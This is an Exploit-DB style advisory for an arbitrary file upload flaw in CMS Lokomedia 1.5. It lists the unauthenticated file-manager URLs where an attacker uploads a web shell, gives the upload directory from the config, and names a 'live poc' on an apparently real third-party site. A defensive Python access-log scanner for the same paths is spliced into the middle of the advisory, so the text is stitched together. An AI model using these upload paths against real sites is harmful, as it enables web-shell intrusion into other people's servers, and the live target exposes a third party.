CMS Lokomedia 1.5 – Arbitrary File Upload

  • Author: eidelweiss
  • Date: 2011-03-21
  • Source: https://www.exploit-db.com/exploits/17014/
  • ===================================================================
    CMS Lokomedia 1.5 Arbitary file upload vulnerability
    ===================================================================
     
    Software: CMS Lokomedia
    Vendor: http://bukulokomedia.com/home
    Vuln Type:Arbitary file upload
    Download link:http://bukulokomedia.com/lokomedia-1.5.rar
    Author: eidelweiss
    contact:eidelweiss[at]windowslive[dot]com
    Home: www.eidelweiss.info
    DORK:	use your skill and play your imagination :P
    
    Gratz:
    - Kuris : status udah merit aja beib.. kgak undang² iks..
    - Richie : RebelgiRL (Limited edition.. lol) live is never flate so enjoy this live mate ^_^
    
    
    References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
     
     
    ===================================================================
     
    
    ----------------------------------
     
    exploit & p0c
    
    [!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html	// upload your file here
    		or
    [!] http://host/tinymcpuk/filemanager/browser.html
    or
    [!] http://host//tinymcpuk/filemanager/frmupload.html
    or
    [!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
     
    your shell or file will be placed here
     
    /*------------------------------------------------------------------------------*/
    /* Path to user files relative to the document root (no trailing slash)		*/
    /*------------------------------------------------------------------------------*/
    $fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;			// <= here 
    /*==============================================================================*/
    /* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
    $fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */				// <= or here
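As an added defensive check (not part of the advisory or of the Lokomedia code), a small Python scanner over web-server access-log lines that flags requests to the unauthenticated file-manager pages listed above and requests for script files out of the tinymcpuk/gambar upload directory. The Apache "combined" log format, the IP addresses and the file names in the sample lines are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

# Apache/nginx "combined" access-log format (assumed; adjust the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Paths named in the advisory: the file-manager pages and the upload directory.
MANAGER_PAGES = ("/tinymcpuk/filemanager/browser.html", "/tinymcpuk/filemanager/frmupload.html")
UPLOAD_DIR = "/tinymcpuk/gambar/"
# Extensions that should never be served from an image upload directory (also catches x.php.jpg).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

@dataclass
class Finding:
    ip: str
    path: str
    reason: str

def classify(path: str) -> "str | None":
    """Return a reason string if the request path matches a risky pattern, else None."""
    p = path.split("?", 1)[0].lower()  # ignore the query string, compare case-insensitively
    if any(p.endswith(page) for page in MANAGER_PAGES):
        return "access to unauthenticated file manager"
    if UPLOAD_DIR in p and SCRIPT_EXT.search(p):
        return "script extension requested from upload directory"
    return None

def scan(lines):
    """Parse combined-format log lines and return the Findings for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reason = classify(m["path"])
        if reason:
            findings.append(Finding(m["ip"], m["path"], reason))
    return findings

# Constructed sample log lines (not real traffic); addresses and file names are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Mar/2011:10:00:01 +0000] "GET /tinymcpuk/filemanager/browser.html HTTP/1.1" 200 4512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Mar/2011:10:00:09 +0000] "GET /lokomedia/tinymcpuk/gambar/cmd.php?x=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Mar/2011:10:01:00 +0000] "GET /tinymcpuk/gambar/logo.jpg HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ip} {f.path}: {f.reason}")
```

Feeding the real access log through `scan()` gives a quick way to see whether the file manager is reachable and whether anything with a script extension has ever been requested from the upload directory.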
    
----------------------------------

live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html


====================================================================

Nothing Impossible In This World Even Nobody's Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================